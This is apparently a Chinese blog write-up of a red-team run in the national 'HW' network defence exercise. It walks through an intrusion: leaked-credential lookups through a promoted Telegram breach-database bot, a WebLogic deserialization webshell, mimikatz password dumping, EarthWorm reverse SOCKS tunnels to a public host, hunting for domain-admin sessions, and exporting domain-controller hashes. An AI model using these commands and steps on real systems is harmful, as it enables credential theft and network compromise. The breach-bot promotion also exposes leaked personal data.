护网简介
护网行动是以公安部牵头,用以评估企事业单位的网络安全的活动。
具体实践中,公安部会组织攻防两方,进攻方会在一个月内对防守方发动网络攻击,检测出防守方(企事业单位)存在的安全漏洞。通过与进攻方的对抗,企事业单位网络、系统以及设备等的安全能力会大大提高。
当前,我国网络安全形势严峻,“为了防止羊被偷,我们得在羊被偷之前就开始识别风险、加固羊圈建设”。
护网行动就是在这样的背景下开展的。
护网行动每年举办一次,政府单位、事业单位、国企单位、名企单位等都必须参与!
测试过程
外网权限获取
1.通过社工库查到邮箱账户密码并登陆
社工库查询地址:
代码语言:javascript复制推荐社工库查询机器人:@FreeSGKbot
输入激活码SGKGCABCRS即可免费使用
加入链接 https://t.me/FreeSGKbot?start=SGKGCABCRS
【需科学上网后才可正常访问】
2.通过翻看邮件内容发现边缘资产并通过反序列化漏洞拿到webshell
Weblogic的路径一般可以通过类似路径查找 (路径最后会有war包的路径 直接上传文件就可以) D:小生观察室eosdomainserversAdminServertmp_WL_user
利用免杀mimikatz抓取密码数据 ----非交互式抓明文密码(webshell中)
代码语言:javascript复制C:/mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" > pssword.txt
内网转发
利用Proxifier EarthWorm
Linux方式
WINDOWS用法:
代码语言:javascript复制
反向代理
a) ./ew -s rcsocks -l 1080 -e 8888
// 在 1.1.1.1 的公网主机添加转接隧道,将 1080 收到的代理请求转交给反连 8888 端口的主机
b) ./ew -s rssocks -d 1.1.1.1 -e 8888
// 将目标网络的可控边界主机反向连接公网主机
c) HackTools 可通过访问 1.1.1.1:1080 端口使用 rssocks 主机提供的 socks5 代理服务
登录内网,当无法使用Net/Net1 交互命令的时候 尽可能的用域账户登录到其他机器上去尝试net命令,然后进一步获取域信息
域渗透
当获取到域管理员和管理组的信息之后,进行查找域管理员登录过的机器,然后进行域管理员账户密码的抓取.
首先查看有多少个域管理员,域管理员最近登录的时间进行比较,尽可能找时间跟当前时间接近的域管理员账户。
经过查看域管理员信息,如果只有这个登陆过(也有可能多个域管理账户都登录过) 就用netsess.exe 或是psloggedon之类的工具查下他现在是否还在线、在哪里登陆的等
代码语言:javascript复制netsess.exe 下载地址:http://www.joeware.net/freetools/tools/netsess/index.htm
psloggedon下载地址:http://technet.microsoft.com/en-us/sysinternals/bb897545.aspx
这2个工具主要是查看是否在线和在哪登陆过,而且是实时查询
所以要多运行几次 每次结果可能都不一样。
只有当用户与域控制器在交互数据的时候才能刚好查询到。
不用操作 后台也会有数据交互的 只要在登录着 就算mstsc断开了也能查的到的,除非已经注销。
多运行几次,每次结果都可能不一样。
前面是小生观察室administrator登录的都可以。
最后,就可以成功抓到域管理员的账户密码了。
域控hash导出
登录域控的服务器上抓取所有用户的Hash值
可参考我之前写的下面两篇详细攻略
利用ProxyShell漏洞获取域控所有Hash
无需免杀获取域控hash小技巧
最好整理记录提交至裁判处。